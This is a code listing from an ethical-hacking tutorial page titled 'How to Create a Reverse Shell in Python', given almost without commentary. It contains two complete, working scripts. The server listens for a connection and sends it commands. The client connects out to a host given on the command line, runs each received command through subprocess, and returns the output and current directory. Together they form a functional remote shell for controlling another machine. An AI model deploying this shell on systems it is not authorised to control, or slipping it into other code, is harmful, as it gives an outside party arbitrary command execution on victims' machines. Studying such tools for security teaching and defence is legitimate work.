Code forHow to Create a Reverse Shell in Python Tutorial
View on Github
server.py
import socketSERVER_HOST = "0.0.0.0"SERVER_PORT = 5003# send 1024 (1kb) a time (as buffer size)BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase# separator string for sending 2 messages in one goSEPARATOR = "<sep>"# create a socket objects = socket.socket()# bind the socket to all IP addresses of this hosts.bind((SERVER_HOST, SERVER_PORT))# make the PORT reusable# when you run the server multiple times in Linux, Address already in use error will raises.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)s.listen(5)print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")# accept any connections attemptedclient_socket, client_address = s.accept()print(f"{client_address[0]}:{client_address[1]} Connected!")# receiving the current working directory of the clientcwd = client_socket.recv(BUFFER_SIZE).decode()print("[+] Current working directory:", cwd)while True: # get the command from prompt command = input(f"{cwd} $> ") if not command.strip(): # empty command continue # send the command to the client client_socket.send(command.encode()) if command.lower() == "exit": # if the command is exit, just break out of the loop break # retrieve command results output = client_socket.recv(BUFFER_SIZE).decode() print("output:", output) # split command output and current directory results, cwd = output.split(SEPARATOR) # print output print(results)# close connection to the clientclient_socket.close()# close server connections.close()client.py
import socketimport osimport subprocessimport sysSERVER_HOST = sys.argv[1]SERVER_PORT = 5003BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase# separator string for sending 2 messages in one goSEPARATOR = "<sep>"# create the socket objects = socket.socket()# connect to the servers.connect((SERVER_HOST, SERVER_PORT))# get the current directorycwd = os.getcwd()s.send(cwd.encode())while True: # receive the command from the server command = s.recv(BUFFER_SIZE).decode() splited_command = command.split() if command.lower() == "exit": # if the command is exit, just break out of the loop break if splited_command[0].lower() == "cd": # cd command, change directory try: os.chdir(' '.join(splited_command[1:])) except FileNotFoundError as e: # if there is an error, set as the output output = str(e) else: # if operation is successful, empty message output = "" else: # execute the command and retrieve the results output = subprocess.getoutput(command) # get the current working directory as output cwd = os.getcwd() # send the results back to the server message = f"{output}{SEPARATOR}{cwd}" s.send(message.encode())# close client connections.close()
Tags
- Ethical Hacking
- Machine Learning
- General Python Tutorials
- Web Scraping
- Finance
- Computer Vision
- Python Standard Library
- Application Programming Interfaces
- Database
- Game Development
- Web Programming
- Digital Forensics
- Natural Language Processing
- Healthcare
- PDF File Handling
- Python for Multimedia
- GUI Programming
- Cryptography
- Packet Manipulation Using Scapy
New Tutorials
Popular Tutorials